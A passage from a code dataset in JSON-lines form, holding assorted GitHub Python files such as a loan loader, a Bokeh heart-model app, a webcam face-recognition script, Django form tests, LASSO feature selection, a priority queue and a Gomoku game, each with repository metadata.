65 <= ord(s[i]) <= 90:\n ans += chr((((ord(s[i]) - 65) - shift) % 26) + 65)\n else:\n ans += s[i]\n\n return ans\n","repo_name":"aaaronhsu/MKS22QA","sub_path":"Unit 2 - Strings and Lists/2_25moreStrings.py","file_name":"2_25moreStrings.py","file_ext":"py","file_size_in_byte":1044,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"2477918955","text":"import csv\n\n\nclass Loan:\n '''\n Loan class.\n '''\n\n def __init__(self, id, interest_rate, default_likelihood, amount, state):\n '''\n :param id: str, loan id\n :param interest_rate: float, interest rate\n :param default_likelihood: float, default likelihood\n :param amount: int, amount\n :param state: str, state code\n id: facility if only if assigned\n '''\n self.id = id\n self.interest_rate = interest_rate\n self.default_likelihood = default_likelihood\n self.amount = amount\n self.state = state\n self.facility_id = None\n\n def __repr__(self):\n return (\n f'Loan [id:{self.id}, '\n f'interest_rate:{self.interest_rate}, '\n f'default_likelihood:{self.default_likelihood}, '\n f'amount:{self.amount}, '\n f'state:{self.state}]'\n )\n\n @staticmethod\n def load(file):\n '''\n Load plain Loans objects from the input file.\n\n :param file: path to loans.csv\n '''\n loan_dict = csv.DictReader(open(file, mode='r'))\n loans = []\n\n for line in loan_dict:\n loan = Loan(id=line['id'],\n amount=int(line['amount']),\n interest_rate=float(line['interest_rate']),\n default_likelihood=float(line['default_likelihood']),\n state=line['state'])\n loans.append(loan)\n\n return loans\n","repo_name":"beaglebagel/code_sample","sub_path":"sample_1/loan.py","file_name":"loan.py","file_ext":"py","file_size_in_byte":1519,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"27805904390","text":"'''\nCreated on Oct 5, 2016\n\n@author: fredrik\n'''\n'''\nCreated on Oct 3, 2016\n\n@author: fredrik\n'''\n\nimport numpy as np\nimport os\nfrom os.path import dirname, join\nfrom bokeh.plotting import Figure\nfrom bokeh.models import ColumnDataSource, Range1d\nfrom bokeh.models.widgets import Select\nfrom classVeWK3 import varyingElastance\n\nimport h5py\n\n\nclass SetupApp:\n \n def __init__(self):\n \n \n self.T = 1.\n N = 250\n self.cardiacCycles = 5\n self.t = np.linspace(0, self.T*self.cardiacCycles, N*self.cardiacCycles + 1)\n\n self.veWK3 = varyingElastance(self.t, self.T)\n \n t, P, P_LV, Q, E, V = self.veWK3.solveNCycle(Ncycles=self.cardiacCycles)\n t_last_cycle = np.linspace(self.T*(self.cardiacCycles - 1), self.T*(self.cardiacCycles - 0), 1001)\n P_last, P_LV_last, Q_last, E_last, V_last = self.getLastCycle(t_last_cycle, t, P, P_LV, Q, E, V)\n \n self.source_p = ColumnDataSource(data=dict(x=t, y=P))\n self.source_p_LV = ColumnDataSource(data=dict(x=t, y=P_LV))\n self.source_LV_loop = ColumnDataSource(data=dict(x=V, y=P_LV))\n \n self.source_p_last = ColumnDataSource(data=dict(x=t_last_cycle, y=P_last))\n self.source_p_LV_last = ColumnDataSource(data=dict(x=t_last_cycle, y=P_LV_last))\n self.source_q_last = ColumnDataSource(data=dict(x=t_last_cycle, y=Q_last))\n self.source_E_last = ColumnDataSource(data=dict(x=[], y=[]))\n # Set up plot_line y = a*x + b\n self.plot_P = Figure(plot_height=400, plot_width=550, title=\"aortic and ventricular pressure\",\n x_axis_label=\"t\", y_axis_label=\"P [mmHg]\",\n tools=\"crosshair,pan,reset,save,wheel_zoom\",\n y_range=[0, 200])\n self.plot_LV_loop = Figure(plot_height=400, plot_width=550, title=\"PV-loop\",\n x_axis_label=\"V [ml]\", y_axis_label=\"P [mmHg]\",\n tools=\"crosshair,pan,reset,save,wheel_zoom\",\n x_range=[0, 200], y_range=[0, 200])\n\n self.plot_P_last = Figure(plot_height=400, plot_width=550, title=\"aortic and ventricular pressure (last cardiac cycle)\",\n x_axis_label=\"t\", y_axis_label=\"P [mmHg]\",\n tools=\"crosshair,pan,reset,save,wheel_zoom\",\n y_range=[0, 200])\n\n self.plot_flow_or_elastance_last = Figure(plot_height=400, plot_width=550, title=\"flow\",\n x_axis_label=\"t\", y_axis_label=\"flow [ml/s]\",\n tools=\"crosshair,pan,reset,save,wheel_zoom\",\n )\n \n self.plot_P.line('x', 'y', source=self.source_p, color='blue', line_alpha=0.6, line_width=2)\n self.plot_P.line('x', 'y', source=self.source_p_LV, color='green', line_alpha=0.6, line_width=2)\n\n self.plot_LV_loop.line('x', 'y', source=self.source_LV_loop, color='blue', line_alpha=0.6, line_width=2)\n \n self.plot_P_last.line('x', 'y', source=self.source_p_last, color='blue', line_alpha=0.6, line_width=2, legend=\"aorta\")\n self.plot_P_last.line('x', 'y', source=self.source_p_LV_last, color='green', line_alpha=0.6, line_width=2, legend=\"left ventricle\")\n \n self.plot_flow_or_elastance_last.line('x', 'y', source=self.source_q_last, color='blue', line_alpha=0.6, line_width=2)\n self.plot_flow_or_elastance_last.line('x', 'y', source=self.source_E_last, color='blue', line_alpha=0.6, line_width=2)\n \n self.resistanceSelect = Select(title=\"selcet total resistance\", value=\"1.25\", options=[\"1\", \"1.25\", \"1.5\"])\n self.resistanceFactorSelect = Select(title=\"selcet factor for proximal resistance\", value=\"0.1\", options=[\"0.05\", \"0.1\", \"0.15\", \"0.2\"])\n self.complianceSelect = Select(title=\"selcet total compliance\", value=\"2.0\", options=[\"1\", \"1.5\", \"2.0\", \"2.5\"])\n self.eMaxSelect = Select(title=\"selcet E max\", value=\"2.0\", options=[\"1\", \"1.5\", \"2.0\", \"2.5\"])\n self.eMinSelect = Select(title=\"selcet E min\", value=\"0.06\", options=[\"0.03\", \"0.06\", \"0.09\", \"0.12\"])\n self.tPeakSelect = Select(title=\"selcet time to peak\", value=\"0.32\", options=[\"0.25\", \"0.28\", \"0.30\", \"0.32\"])\n self.RvSelect = Select(title=\"selcet mitral resistance\", value=\"0.005\", options=[\"0.0025\", \"0.005\", \"0.01\", \"0.05\"])\n self.n1Select = Select(title=\"select elastance shape-function n1\", value=\"1.32\", options=[\"1.1\", \"1.2\", \"1.32\", \"1.4\"])\n self.n2Select = Select(title=\"select elastance shape-function n2\", value=\"21.9\", options=[\"15\", \"21.9\", \"25\", \"30\"])\n self.flowOrElastanceSelect = Select(title=\"show flow or elastance\", value=\"flow\", options=[\"flow\", \"elastance\"])\n self.nCyclesSelect = Select(title=\"select number of cycles\", value=\"5\", options=[\"2\", \"3\", \"4\", \"5\", \"6\", \"7\", \"8\", \"9\", \"10\", \"11\", \"12\", \"13\", \"14\", \"15\"])\n self.nTimePointsSelect = Select(title=\"select time-points per cycle\", value=\"250\", options=[\"100\", \"150\", \"200\", \"250\", \"500\", \"1000\", \"2000\", \"3000\", \"4000\", \"5000\", \"6000\", \"7000\", \"8000\", \"9000\", \"10000\"])\n\n self.symbolicSelect = Select(title=\"use symbolic differentiation\", value=\"True\", options=[\"True\", \"False\"])\n self.isoSelect = Select(title=\"use integrated iso eq\", value=\"True\", options=[\"True\", \"False\"])\n\n \n\n\n self.Widgetlist = [self.resistanceSelect, self.resistanceFactorSelect, self.complianceSelect,\n self.eMaxSelect, self.eMinSelect, self.tPeakSelect, self.RvSelect,\n self.n1Select, self.n2Select, self.flowOrElastanceSelect, self.nCyclesSelect, \n self.nTimePointsSelect, self.symbolicSelect, self.isoSelect]\n \n def update_data(self, attrname, old, new):\n \n \n R_tot = float(self.resistanceSelect.value)\n\n R_factor = float(self.resistanceFactorSelect.value)\n C_tot = float(self.complianceSelect.value)\n Emax = float(self.eMaxSelect.value)\n\n Emin = float(self.eMinSelect.value)\n TPeak = float(self.tPeakSelect.value)\n Rv = float(self.RvSelect.value)\n n1 = float(self.n1Select.value)\n n2 = float(self.n2Select.value)\n flowOrElastance = self.flowOrElastanceSelect.value\n self.cardiacCycles = int(self.nCyclesSelect.value)\n symbolic_differentiation = (self.symbolicSelect.value)\n integrated_iso_eq = (self.isoSelect.value)\n N = int(self.nTimePointsSelect.value)\n t = np.linspace(0, self.T*self.cardiacCycles, N*self.cardiacCycles + 1)\n \n \n \n self.veWK3.initializeWKParams(R_tot=R_tot, C_tot=C_tot, R1_frac=R_factor)\n self.veWK3.Emax = Emax\n self.veWK3.Emin = Emin\n self.veWK3.TPeak = TPeak\n self.veWK3.Rv = Rv\n self.veWK3.n1 = n1\n self.veWK3.n2 = n2\n \n if symbolic_differentiation == \"True\":\n self.veWK3.symbolic_differentiation = True\n else:\n self.veWK3.symbolic_differentiation = False\n\n if integrated_iso_eq == \"True\":\n self.veWK3.integrated_iso_eq = True\n else:\n self.veWK3.integrated_iso_eq = False\n \n self.veWK3.t = t\n t, P, P_LV, Q, E, V = self.veWK3.solveNCycle(Ncycles=self.cardiacCycles)\n \n t_last_cycle = np.linspace(self.T*(self.cardiacCycles - 1), self.T*(self.cardiacCycles - 0), 1001)\n \n P_last, P_LV_last, Q_last, E_last, V_last = self.getLastCycle(t_last_cycle, t, P, P_LV, Q, E, V)\n \n self.source_p.data = dict(x=t, y=P)\n self.source_p_LV.data = dict(x=t, y=P_LV)\n self.source_LV_loop.data = dict(x=V_last, y=P_LV_last)\n self.source_p_last.data = dict(x=t_last_cycle, y=P_last)\n self.source_p_LV_last.data = dict(x=t_last_cycle, y=P_LV_last)\n \n if flowOrElastance == \"flow\":\n self.source_q_last.data = dict(x=t_last_cycle, y=Q_last)\n self.source_E_last.data = dict(x=[], y=[])\n self.plot_flow_or_elastance_last.title.text = \"flow\"\n self.plot_flow_or_elastance_last.yaxis.axis_label = \"flow [ml/s]\"\n else:\n self.source_q_last.data = dict(x=[], y=[])\n self.source_E_last.data = dict(x=t_last_cycle, y=E_last)\n self.plot_flow_or_elastance_last.title.text = \"elastance\"\n self.plot_flow_or_elastance_last.yaxis.axis_label = \"E [mmHg/ml]\"\n \n \n #self.plotQ.title.text = \"Qm = ({0}, {1}); (reference, ecmo)\".format(Qm, Qm_ecmo)\n \n def getLastCycle(self, t_last, t, P, P_LV, Q, E, V):\n \n P_last = np.interp(t_last, t, P)\n P_LV_last = np.interp(t_last, t, P_LV)\n Q_last = np.interp(t_last, t, Q)\n E_last = np.interp(t_last, t, E)\n V_last = np.interp(t_last, t, V)\n \n return P_last, P_LV_last, Q_last, E_last, V_last\n \n\n","repo_name":"Fredf10/apps","sub_path":"VeWK3/classCreateSimpleApp.py","file_name":"classCreateSimpleApp.py","file_ext":"py","file_size_in_byte":9069,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"24028555215","text":"import cv2\r\nimport numpy\r\nimport face_recognition\r\nimport os\r\n\r\npath = \"img\"\r\nimages = []\r\nclassNames = []\r\nmyList = os.listdir(path)\r\nprint(myList)\r\n\r\nfor i in myList:\r\n #loads the images\r\n currImg = cv2.imread(f'{path}/{i}')\r\n images.append(currImg)\r\n #without .jpg\r\n classNames.append(os.path.splitext(i)[0])\r\nprint(images)\r\nprint(classNames)\r\n\r\ndef findEncoding(images):\r\n encodeList = []\r\n \r\n for img in images:\r\n # for better Results\r\n img = cv2.cvtColor(img,cv2.COLOR_BGR2RGB)\r\n \r\n # recognize the face\r\n encode = face_recognition.face_encodings(img)[0]\r\n encodeList.append(encode)\r\n return encodeList\r\n\r\nencodeList = findEncoding(images)\r\nprint(\"Encoding Completed\\n\")\r\n\r\ncap = cv2.VideoCapture(0)\r\n\r\nwhile True:\r\n # cap.read() return 2 content\r\n success, img = cap.read()\r\n\r\n # size reduce will speed the process 1/4th\r\n imgS = cv2.resize(img,(0,0),None,0.25,0.25)\r\n imgS = cv2.cvtColor(imgS,cv2.COLOR_BGR2RGB)\r\n\r\n facesCurrFrame = face_recognition.face_locations(imgS)\r\n encodeCurrFrame = face_recognition.face_encodings(imgS,facesCurrFrame)\r\n\r\n for encodeFace,faceLoc in zip(encodeCurrFrame,facesCurrFrame):\r\n matches = face_recognition.compare_faces(encodeList,encodeFace)\r\n faceDis = face_recognition.face_distance(encodeList,encodeFace)\r\n #print(faceDis)\r\n matchIndex = numpy.argmin(faceDis)\r\n if matches[matchIndex]:\r\n name = classNames[matchIndex]\r\n #print(name)\r\n y1,x2,y2,x1 = faceLoc\r\n y1,x2,y2,x1 = y1*4,x2*4,y2*4,x1*4\r\n # form rectange around the face\r\n cv2.rectangle(img,(x1,y1),(x2,y2),(564,255,0),2)\r\n # form rectangle in which we write name\r\n cv2.rectangle(img,(x1,y2-35),(x2,y2),(0,255,0),cv2.FILLED)\r\n # for name\r\n cv2.putText(img, name,(x1+6,y2-6),cv2.FONT_HERSHEY_COMPLEX,1,(255,255,255),2)\r\n \r\n cv2.imshow('Webcam',img)\r\n if cv2.waitKey(1) & 0xFF == ord('q'):\r\n break\r\n\r\n# Release handle to the webcam\r\nvideo_capture.release()\r\ncv2.destroyAllWindows()","repo_name":"Dikshant20011891/Face-Recognition","sub_path":"faceRecog.py","file_name":"faceRecog.py","file_ext":"py","file_size_in_byte":2139,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"11932911187","text":"import shutil\nimport tempfile\n\nfrom django import forms\nfrom django.conf import settings\nfrom django.core.files.uploadedfile import SimpleUploadedFile\nfrom django.test import override_settings\n\nfrom posts.models import Comment, Post\nfrom .test_config import CREATE_REVERSE, BaseTestCase\n\nSMALL_JPG = (\n b'\\x47\\x49\\x46\\x38\\x39\\x61\\x02\\x00'\n b'\\x01\\x00\\x80\\x00\\x00\\x00\\x00\\x00'\n b'\\xFF\\xFF\\xFF\\x21\\xF9\\x04\\x00\\x00'\n b'\\x00\\x00\\x00\\x2C\\x00\\x00\\x00\\x00'\n b'\\x02\\x00\\x01\\x00\\x00\\x02\\x02\\x0C'\n b'\\x0A\\x00\\x3B'\n)\nUPLOADED = SimpleUploadedFile(\n name='small.jpg',\n content=SMALL_JPG,\n content_type='image/jpg'\n)\nUPLOADED_EDIT = SimpleUploadedFile(\n name='small_edit.jpg',\n content=SMALL_JPG,\n content_type='image/jpg'\n)\nPATH_TO_IMAGE = f'posts/{UPLOADED.name}'\nPATH_TO_IMAGE_EDIT = f'posts/{UPLOADED_EDIT.name}'\nTEMP_MEDIA_ROOT = tempfile.mkdtemp(dir=settings.BASE_DIR)\n\n\n@override_settings(MEDIA_ROOT=TEMP_MEDIA_ROOT)\nclass PostFormTests(BaseTestCase):\n @classmethod\n def tearDownClass(cls):\n super().tearDownClass()\n shutil.rmtree(TEMP_MEDIA_ROOT, ignore_errors=True)\n\n def test_create_post_show_correct_context(self):\n \"\"\"Шаблон create_form сформирован с правильным контекстом.\"\"\"\n responses = {\n self.authors_client.get(CREATE_REVERSE):\n 'create',\n self.authors_client.get(\n self.POST_EDIT_REVERSE): 'edit'\n }\n for response, act in responses.items():\n if act == 'create':\n form_fields = {\n 'text': forms.fields.CharField,\n 'group': forms.models.ModelChoiceField\n }\n for value, expected in form_fields.items():\n with self.subTest(value=value):\n form_field = response.context['form'].fields[value]\n self.assertIsInstance(form_field, expected)\n elif act == 'edit':\n form_instance = response.context['form'].instance\n self.assertEqual(form_instance, self.posts)\n\n def test_post_form_create_post(self):\n \"\"\"Валидная форма создает пост\"\"\"\n posts_count = Post.objects.count()\n form_data = {\n 'text': 'Test text',\n 'group': self.first_group.pk,\n 'image': UPLOADED\n }\n self.authors_client.post(\n CREATE_REVERSE,\n data=form_data,\n follow=True\n )\n post = Post.objects.latest('pub_date')\n self.assertEqual(Post.objects.count(), posts_count + 1)\n self.assertEqual(post.text, form_data['text'])\n self.assertEqual(post.group.pk, form_data['group'])\n self.assertEqual(post.author, self.author)\n self.assertEqual(post.image, PATH_TO_IMAGE)\n\n def test_post_form_edit_post(self):\n \"\"\"Валидная форма редактирует пост\"\"\"\n post_count = Post.objects.all().count()\n form_data_edit = {\n 'text': 'Edited',\n 'group': self.first_group.pk,\n 'image': UPLOADED_EDIT\n }\n response = self.authors_client.post(\n self.POST_EDIT_REVERSE,\n data=form_data_edit,\n follow=True\n )\n post = Post.objects.get(text=form_data_edit['text'])\n\n self.assertRedirects(response, self.POST_DETAIL_REVERSE)\n self.assertEqual(post_count, Post.objects.all().count())\n self.assertEqual(post.text, form_data_edit['text'])\n self.assertEqual(post.group.id, form_data_edit['group'])\n self.assertEqual(post.author, self.author)\n self.assertEqual(post.image, PATH_TO_IMAGE_EDIT)\n\n\nclass CommentFormTest(BaseTestCase):\n def test_authorized_user_comment_post(self):\n comment_count = Comment.objects.all().count()\n comment_data = {\n 'text': 'Test comment',\n 'post': self.posts,\n 'author': self.author\n }\n response = self.authors_client.post(\n self.COMMENT_REVERSE,\n data=comment_data,\n follow=True\n )\n self.assertRedirects(\n response, self.POST_DETAIL_REVERSE\n )\n created_comment = Comment.objects.latest('created')\n self.assertEqual(Comment.objects.all().count(), comment_count + 1)\n self.assertEqual(created_comment.text, comment_data['text'])\n self.assertEqual(created_comment.post, comment_data['post'])\n self.assertEqual(created_comment.author, comment_data['author'])\n response = self.authors_client.get(\n self.POST_DETAIL_REVERSE)\n self.assertIn(created_comment, response.context['comments'])\n","repo_name":"alekswonder/Yatube","sub_path":"yatube/posts/tests/test_forms.py","file_name":"test_forms.py","file_ext":"py","file_size_in_byte":4760,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"37787200501","text":"def fac(n):\n if n==1:\n return 1\n else:\n return n*fac(n-1)\n\n\nprint(fac(6))\n\n#斐波那契数列\ndef fib(n):\n if n==1:\n return 1\n elif n==2:\n return 1\n else:\n return fib(n-1)+fib(n-2)\n\n#斐波那契数列第六位上的数\nprint(fib(6))\n\n#输出这个数列前六位\nfor i in range(1,7):\n print(fib(i))","repo_name":"weeinee/python-study","sub_path":"project/递归函数.py","file_name":"递归函数.py","file_ext":"py","file_size_in_byte":353,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"15530218595","text":"\"\"\"Feature selection.\n\n\"\"\"\n\n\n# import numba as nb\nimport numpy as np\nimport pandas as pd\nimport sklearn as skl\nimport matplotlib.pyplot as plt\nfrom sklearn.linear_model import Lasso\nfrom unipy.stats.formula import from_formula\nfrom unipy.stats.metrics import vif\n\n\n__all__ = ['lasso_rank',\n 'feature_selection_vif']\n\n\n# Defining a Lasso generic function\ndef _lasso_for_loop(data, X=None, y=None, alpha=.0001, *args, **kwargs):\n\n # Fit to the model\n lassoReg = Lasso(alpha=alpha, fit_intercept=True,\n normalize=True, precompute=False,\n max_iter=1e5, tol=1e-7,\n warm_start=False, positive=False,\n selection='cyclic', *args, **kwargs)\n\n lassoReg.fit(data[X], data[y].squeeze())\n yPredict = lassoReg.predict(data[X])\n\n # Return the result in pre-defined format\n rss = np.sum((yPredict - data[y].squeeze()) ** 2)\n ret = [rss]\n ret.extend([lassoReg.intercept_])\n ret.extend(lassoReg.coef_)\n\n return ret, yPredict\n\n\ndef lasso_rank(formula=None, X=None, y=None, data=None,\n alpha=np.arange(1e-5, 1e-2, 1e-4), k=2, plot=False,\n *args, **kwargs):\n \"\"\"Feature selection by LASSO regression.\n\n Parameters\n ----------\n formula:\n R-style formula string\n\n X: list-like\n Column values for X.\n\n y: list-like\n A column value for y.\n\n data: pandas.DataFrame\n A DataFrame.\n\n alpha: Iterable\n An Iterable contains alpha values.\n k: int\n Threshold of coefficient matrix\n\n plot: Boolean (default: False)\n True if want to plot the result.\n\n Returns\n -------\n rankTbl: pandas.DataFrame\n Feature ranking by given ``k``.\n\n minIntercept: pandas.DataFrame\n The minimum intercept row in coefficient matrix.\n\n coefMatrix: pandas.DataFrame\n A coefficient matrix.\n\n kBest: pandas.DataFrame\n When Given ``k``, The best intercept row in coefficient matrix.\n\n kBestPredY: dict\n A predicted ``Y`` with ``kBest`` alpha.\n\n Example\n -------\n >>> import unipy.dataset.api as dm\n >>> dm.init()\n ['cars', 'anscombe', 'iris', 'nutrients', 'german_credit_scoring_fars2008', 'winequality_red', 'winequality_white', 'titanic', 'car90', 'diabetes', 'adult', 'tips', 'births_big', 'breast_cancer', 'air_quality', 'births_small']\n >>> wine_red = dm.load('winequality_red')\n Dataset : winequality_red\n >>>\n >>> ranked, best_by_intercept, coefTbl, kBest, kBestPred = lasso_rank(X=wine_red.columns.drop('quality'), y=['quality'], data=wine_red)\n >>> ranked\n rank lasso_coef abs_coef\n volatile_acidity 1 -0.675725 0.675725\n alcohol 2 0.194865 0.194865\n >>> best_by_intercept\n RSS Intercept fixed_acidity volatile_acidity \\\n alpha_0.00121 691.956364 3.134874 0.002374 -1.023793\n\n citric_acid residual_sugar chlorides free_sulfur_dioxide \\\n alpha_0.00121 0.0 0.0 -0.272912 -0.0\n\n total_sulfur_dioxide density pH sulphates alcohol \\\n alpha_0.00121 -0.000963 -0.0 -0.0 0.505956 0.264552\n\n var_count\n alpha_0.00121 6\n >>>\n \"\"\"\n if formula is not None:\n X, y = from_formula(formula)\n else:\n X = list(X)\n y = y\n\n # Iterate over the alpha values\n coefMatrix = {'alpha_%.5f' % a: _lasso_for_loop(data, X=X, y=y, alpha=a, *args, **kwargs)[0] for a in alpha}\n predict = {'alpha_%.5f' % a: _lasso_for_loop(data, X=X, y=y, alpha=a, *args, **kwargs)[1] for a in alpha}\n\n coefMatrix = pd.DataFrame(coefMatrix).T\n coefMatrix.columns = ['RSS', 'Intercept'] + X\n coefMatrix['var_count'] = coefMatrix.apply(np.count_nonzero, axis=1) - 2\n\n # Filter by thresh >= var_count\n kBest = coefMatrix[coefMatrix['var_count'] <= k]\n kBest = kBest.loc[kBest[['var_count']].idxmax()]\n kBest = kBest.loc[kBest[['Intercept']].idxmin()]\n\n # Minumum Intercept\n minIntercept = coefMatrix.loc[coefMatrix[['Intercept']].idxmin()]\n\n # Get Predicted Y value\n alphaVal = kBest.index[0]\n kBestPredY = {alphaVal: predict[alphaVal]}\n\n # Get a Rank Table\n lassoVal = kBest.iloc[:, kBest.squeeze().nonzero()[0].tolist()[2:-1]]\n filteredTbl = pd.concat([lassoVal.T, abs(lassoVal).T], axis=1)\n filteredTbl.columns = ['lasso_coef', 'abs_coef']\n filteredTbl = filteredTbl.sort_values(by='abs_coef', ascending=False)\n filteredTbl['rank'] = range(1, len(filteredTbl) + 1)\n rankTbl = filteredTbl[['rank', 'lasso_coef', 'abs_coef']]\n\n # Plots\n #fig = plt.figure(figsize=(12, 9))\n #title = 'Top {} variables : absolute coefficient by Lasso'.format(len(filteredTbl))\n #rankTbl['abs_coef'].plot(kind='barh')\n #fig.suptitle(title, fontsize=14, fontweight='bold')\n #plt.tight_layout(pad=5)\n\n return rankTbl, minIntercept, coefMatrix, kBest, kBestPredY\n\n\ndef feature_selection_vif(data, thresh=5.0):\n '''Stepwise Feature Selection for multivariate analysis.\n\n It calculates OLS regressions and the variance inflation factors iterating\n all explanatory variables. If the maximum VIF of a variable is over the\n given threshold, It will be dropped. This process is repeated until all\n VIFs are lower than the given threshold.\n\n Recommended threshold is lower than 5, because if VIF is greater than 5,\n then the explanatory variable selected is highly collinear with the other\n explanatory variables, and the parameter estimates will have large standard\n errors because of this.\n\n Parameters\n ----------\n data : DataFrame, (rows: observed values, columns: multivariate variables)\n design dataframe with all explanatory variables, as for example used in\n regression\n\n thresh : int, float\n A threshold of VIF\n\n Returns\n -------\n Filtered_data : DataFrame\n A subset of the input DataFame\n\n dropped_List : DataFrame\n 'var' column : dropped variable names from input data columns\n 'vif' column : variance inflation factor of dropped variables\n\n Notes\n -----\n This function does not save the auxiliary regression.\n\n See Also\n --------\n statsmodels.stats.outliers_influence.variance_inflation_factor\n\n References\n ----------\n http://en.wikipedia.org/wiki/Variance_inflation_factor\n\n '''\n assert isinstance(data, pd.DataFrame)\n\n # Create Dropped variable list\n dropped = pd.DataFrame(columns=['var', 'vif'])\n\n # Startswith 'drop = True'(Assume that some variables will be dropped)\n dropCondition = True\n\n # Calculate a VIF & Drop columns(variables)\n while dropCondition:\n\n # 1. Calculate a VIF\n vifDict = {col: vif(data.loc[:, col], data.loc[:, data.columns != col])\n for col in data.columns}\n\n # Get the MAXIMUM VIF\n maxVar = max(vifDict, key=vifDict.get)\n maxVal = vifDict[maxVar]\n\n # 2. IF VIF values are over the threshold, THEN drop it\n if maxVal >= thresh:\n\n # Keep it\n dropped = dropped.append({'var': maxVar, 'vif': maxVal},\n ignore_index=True)\n\n # Drop it\n data = data.drop(maxVar, axis=1)\n\n # Print it\n print(\"Dropping '\" + str(maxVar) + \"' \" + \" VIF: \" + str(maxVal))\n\n # Since a variable has been dropped, the assumption remains\n dropCondition = True\n\n else:\n\n # No variable dropped, the assumption has been rejected\n dropCondition = False\n\n # Print Massages\n remainsMsg = '# Remaining Variables '\n msgWrapper = '-' * (len(remainsMsg)+1)\n\n print('\\n' + msgWrapper + '\\n' + remainsMsg + '\\n' + msgWrapper)\n print(list(data.columns))\n print('\\n')\n\n droppedMsg = '# Dropped Variables '\n msgWrapper = '-' * (len(remainsMsg)+1)\n print('\\n' + msgWrapper + '\\n' + droppedMsg + '\\n' + msgWrapper)\n print(list(dropped.loc[:, 'var']))\n print('\\n')\n\n return data, dropped\n","repo_name":"pydemia/unipy","sub_path":"unipy/stats/feature_selection.py","file_name":"feature_selection.py","file_ext":"py","file_size_in_byte":8127,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"37689410932","text":"class PriorityQueue(object):\n def __init__(self):\n self._head = None\n self._tail = None\n self._count = 0\n \n def is_empty(self):\n return self._count == 0\n \n def __len__(self):\n return self._count\n \n def __str__(self):\n current_node = self._head\n string_list = []\n while current_node is not None:\n string_list.append(str((current_node.item, current_node.priority)))\n current_node = current_node.next\n return str(string_list)\n \n def enqueue(self, item, priority):\n new_entry = _PriorityQEntry(item, priority)\n if self.is_empty():\n self._head = new_entry\n else:\n self._tail.next = new_entry\n \n self._tail = new_entry \n self._count += 1\n \n def dequeue(self):\n assert not self.is_empty(), \"cannot pop from empty queue\"\n\n max_priority_entry = self._head\n pre_entry = None\n\n current_node = self._head\n pre_node = None\n while current_node is not None:\n if current_node.priority > max_priority_entry.priority:\n pre_entry = pre_node\n max_priority_entry = current_node\n \n pre_node = current_node\n current_node = current_node.next\n \n item = max_priority_entry.item\n \n if max_priority_entry == self._head:\n self._head = self._head.next\n else:\n pre_entry.next = max_priority_entry.next\n \n self._count -= 1\n \n return item\n \nclass _PriorityQEntry(object):\n def __init__(self, item, priority, link=None):\n self.item = item\n self.priority = priority\n self.next = link\n \n \ndef main():\n print(\"create new priority\")\n Q = PriorityQueue()\n print()\n \n print(\"add (1,2)\")\n Q.enqueue(1,2)\n \n print(\"add (3,5)\")\n Q.enqueue(3,5)\n \n print(\"add (6,1)\")\n Q.enqueue(6,1)\n \n print(\"add (2,4)\")\n Q.enqueue(2,4)\n \n print(\"add (0,2)\")\n Q.enqueue(0,2)\n \n print(\"add (125,2)\")\n Q.enqueue(125,2)\n \n print(\"add (325,2)\")\n Q.enqueue(325,2)\n \n print()\n \n print(\"Queue: \")\n print(Q)\n \n print(\"dequeue: %d\"% Q.dequeue())\n print(Q)\n print()\n \n print(\"dequeue: %d\"% Q.dequeue())\n print(Q)\n print()\n \n print(\"dequeue: %d\"% Q.dequeue())\n print(Q)\n print()\n \n print(\"dequeue: %d\"% Q.dequeue())\n print(Q)\n print()\n\n \nif __name__ == \"__main__\":\n main()\n \n \n \n \n \n \n \n \n \n \n ","repo_name":"yuhanliu0121/learnDataStructure","sub_path":"Chapter8_Queue/5_priorityQueue_linkedlist.py","file_name":"5_priorityQueue_linkedlist.py","file_ext":"py","file_size_in_byte":2665,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"15520206415","text":"from board import Board\nfrom player import Player\n\nclass Gomoku:\n\tdef __init__(self):\n\t\tself.player1 = Player(1)\n\t\tself.player2 = Player(2)\n\t\tself.board = Board()\n\n\t#self is object itself (in this case gomoku)\n\t#capitalize objects and classes\n\tdef play(self):\n\t\twhile True:\n\t\t\tturn_x = raw_input(\"Player 1 turn x: \")\t\n\t\t\tturn_y = raw_input(\"Player 1 turn y: \")\n\t\t\t\n\t\t\twhile not (self.player1.check_legal(self.board,int(turn_x),int(turn_y))):\n\t\t\t\tturn_x = raw_input(\"Player 1 turn x: \")\t\n\t\t\t\tturn_y = raw_input(\"Player 1 turn y: \")\n\t\t\tself.player1.move(self.board,int(turn_x),int(turn_y))\n\t\t\t\n\t\t\tif self.player1.win(self.board,int(turn_x),int(turn_y)):\n\t\t\t\tprint(\"Player 1 wins\")\n\t\t\t\treturn\n\t\t\t\n\t\t\tturn_x = raw_input(\"Player 2 turn x: \")\t\n\t\t\tturn_y = raw_input(\"Player 2 turn y: \")\n\n\t\t\twhile not (self.player2.check_legal(self.board,int(turn_x),int(turn_y))):\n\t\t\t\tturn_x = raw_input(\"Player 2 turn x: \")\t\n\t\t\t\tturn_y = raw_input(\"Player 2 turn y: \")\n\t\t\tself.player2.move(self.board,int(turn_x),int(turn_y))\n\t\t\t\n\t\t\tif self.player2.win(self.board,int(turn_x),int(turn_y)):\n\t\t\t\tprint(\"Player 2 wins\")\n\t\t\t\treturn\n\ngame = Gomoku()\ngame.play()\n\n","repo_name":"purriah/Gomoku","sub_path":"gomoku.py","file_name":"gomoku.py","file_ext":"py","file_size_in_byte":1137,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"5901210117","text":"from alibabacloud_resourcemanager20200331.client import Client as ResourceManager20200331Client\nfrom alibabacloud_tea_openapi import models as open_api_models\nfrom alibabacloud_resourcemanager20200331 import models as resource_manager_20200331_models\nfrom alibabacloud_ecs20140526.client import Client as Ecs20140526Client\nfrom alibabacloud_ecs20140526 